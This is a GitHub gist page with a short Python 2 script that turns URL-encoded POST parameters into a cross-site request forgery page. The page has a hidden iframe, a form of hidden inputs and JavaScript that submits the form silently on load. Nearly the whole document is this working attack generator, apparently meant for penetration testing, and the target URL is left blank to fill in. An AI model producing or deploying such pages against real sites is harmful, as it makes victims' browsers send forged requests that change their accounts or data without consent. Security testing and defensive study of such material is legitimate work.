Skip to content

Instantly share code, notes, and snippets.

@disconnect3d
Created September 2, 2016 09:50
Show Gist options
  • Save disconnect3d/df82339f7cba78e7ce85b32fc2dbea85 to your computer and use it in GitHub Desktop.
Save disconnect3d/df82339f7cba78e7ce85b32fc2dbea85 to your computer and use it in GitHub Desktop.
Generates POST CSRF html
"""
Takes input on stdin and generates html doing POST CSRF
E.g. input:
a=b&c=d
"""
import sys
import urllib
from collections import OrderedDict
post_data = sys.stdin.read()
post_data = post_data.strip()
params = OrderedDict(
(urllib.unquote(key), urllib.unquote(value)) for key, value in map(lambda i: i.split('='), post_data.split('&'))
)
html = """
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='{url}' target="csrf-frame" id="csrf-form">
{inputs}
<input type='submit' style="display:none" value='submit'>
</form>
<script>
document.getElementById("csrf-form").submit()
</script>
"""
input_fmt = "<input type='hidden' name='{name}' value='{value}'>"
inputs = '\n '.join(input_fmt.format(name=k, value=v) for k,v in params.items())
url = ''
print html.format(url=url, inputs=inputs)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment